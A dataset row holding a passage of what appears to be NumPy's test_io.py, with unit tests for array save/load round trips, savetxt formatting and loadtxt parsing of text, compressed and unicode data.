source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_io.py | import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings
)
from numpy.testing._private.utils import requires_memory
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
#FIXME: Is this still true?
@pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with suppress_warnings() as sup:
sup.filter(Warning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it. This needs to
# pass a file name to load for the test. On windows failure will
# cause a second error will be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(object):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
# our gz wrapper support encoding
suffixes = ['', '.gz']
# stdlib 2 versions do not support encoding
if MAJVER > 2:
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode_)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
@pytest.mark.parametrize("fmt", [u"%f", b"%f"])
@pytest.mark.parametrize("iotype", [StringIO, BytesIO])
def test_unicode_and_bytes_fmt(self, fmt, iotype):
# string type of fmt should not matter, see also gh-4053
a = np.array([1.])
s = iotype()
np.savetxt(s, a, fmt=fmt)
s.seek(0)
if iotype is StringIO:
assert_equal(s.read(), u"%f\n" % 1.)
else:
assert_equal(s.read(), b"%f\n" % 1.)
@pytest.mark.skipif(sys.platform=='win32',
reason="large files cause problems")
@pytest.mark.slow
@requires_memory(free_bytes=7e9)
def test_large_zip(self):
# The test takes at least 6GB of memory, writes a file larger than 4GB
test_data = np.asarray([np.random.rand(np.random.randint(50,100),4)
for i in range(800000)])
with tempdir() as tmpdir:
np.savez(os.path.join(tmpdir, 'test.npz'), test_data=test_data)
class LoadTxtBase(object):
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
# Python2 .open does not support encoding
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlaute
nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode_)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode_, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode_,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode_,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt(object):
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_from_complex(self):
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
